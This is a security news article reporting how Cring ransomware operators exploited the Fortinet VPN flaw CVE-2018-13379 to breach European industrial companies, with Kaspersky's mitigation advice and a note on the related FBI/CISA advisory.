Unpatched Fortinet VPN Devices Are Attacked by New Cring Ransomware
Hackers Exploit the CVE-2018-13379 Vulnerability in Fortinet VPN to Deploy Cring Ransomware to Companies in the Industrial Sector.
Cybercriminals are actively exploiting the CVE-2018-13379 vulnerability in Fortinet VPNs to deploy a brand new type of ransomware, tracked as Cring ransomware to companies in the industrial sector.
The Cring ransomware, also known as Crypt3r, Vjiszy1lo, Ghost, Phantom, became noticeable in January when it was found by Amigo_A and spotted by the CSIRT team of Swiss telecommunications provider Swisscom.
The CVE-2018-13379 is a path traversal flaw in the FortiOS SSL VPN web portal that could be used by an unauthenticated threat actor to download FortiOS system files via specially crafted HTTP resource requests.
The Cring ransomware operators utilized a PowerShell script to decipher their payload: the Cobalt Strike Beacon backdoor which gave them remote control of the affected system. After that, the Cring ransomware was downloaded and after encryption, it released a ransom note.
CRING a new strain deployed by human operated ransomware actors. After the actors have established initial access, they drop a customized Mimikatz sample followed by #CobaltStrike. The #CRING #ransomware is then downloaded via certutill. ^mikehttps://t.co/v5h8eqHCPt pic.twitter.com/fkU2USEZis
— Swisscom CSIRT (@swisscom_csirt) January 26, 2021
Vyacheslav Kopeytsev, a senior security researcher at global security firm Kaspersky’s Industrial Control Systems Computer Emergency Response Team, revealed in a report that threat actors use Internet-exposed Fortigate SSL VPN servers unpatched against the CVE-2018-13379 vulnerability, which authorize them to violate their targets’ network.
Victims of these attacks include industrial enterprises in European countries. At least in one case, an attack of the ransomware resulted in a temporary shutdown of the industrial process due to servers used to control the industrial process becoming encrypted.
The minute they obtained access to a system inside the target network, the hackers downloaded the Mimikatz utility to steal the credentials of Windows users who logged in to the infected system.
As we said before, the ransomware payloads are then distributed to devices on the victims’ networks using the Cobalt Strike threat emulation framework deployed using a malicious PowerShell script.
This ransomware encrypts data from victims with AES-256 + RSA-8192 and then demands a ~ 2 BTC ransom to get the files back.
The users were then alerted by ransom notes named !!!!!readme.rtf and deReadMe!!!.txt that their network has been encrypted and they need to pay the ransom as soon as possible because the decryption key will not be kept indefinitely.
According to Kopeytsev, here’s what you have to do to stay safe from this ransomware attack:
- Update the software of the SSL VPN Gateway to the latest versions;
- Update anti-malware solutions to the latest versions;
- Always keep anti-malware databases updated to the latest versions;
- Always check if all modules of anti-malware solutions are enabled;
- Change the active directory policy: enable users to log in only to those systems which are required by their operational needs;
- Restrict VPN access between facilities, close all ports that are not required by operational needs;
- Configure the back-up system to store back-up copies on a dedicated server;
- Store at least three back-up copies for each critical system;
- Store at least one back-up copy of each server on a dedicated, standalone storage medium, such as a hard drive;
- Verify the integrity of back-up copies periodically.
Since December 2020, when the operation initially came to light, affected people have been using the ID-Ransomware service to verify if Cring ransomware infected their systems. 30 Cring ransomware samples have been submitted up to now, with at least one per day since the end of January.
Kaspersky also shared Indicators of compromise (IOCs) in its report.
Earlier this month, the U.S. Federal Bureau of Investigation (FBI) and the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) have issued a joint cybersecurity advisory informing that hacking groups are deliberately targeting vulnerabilities in Fortinet FortiOS.
The FBI and CISA detected Advanced Persistent Threat (APT) attackers scanning devices on ports 4443, 8443, and 10443 for CVE-2018-13379 in FortiOS. They also observed attackers scanning enumerated devices for CVE-2020-12812 and CVE-2019-5591.
State hackers exploited the CVE-2018-13379 vulnerability before damaging U.S. election support systems accessible over the Internet.
Fortinet followed upon its release of a patch for CVE-2018-13379 with blog posts in August 2019 and July 2020 to come up with more information and alert clients of active attacks by APT29.
Fortinet said the security of their clients is their top priority and urge the ones who didn’t implement the upgrade and mitigations to take action as soon as possible.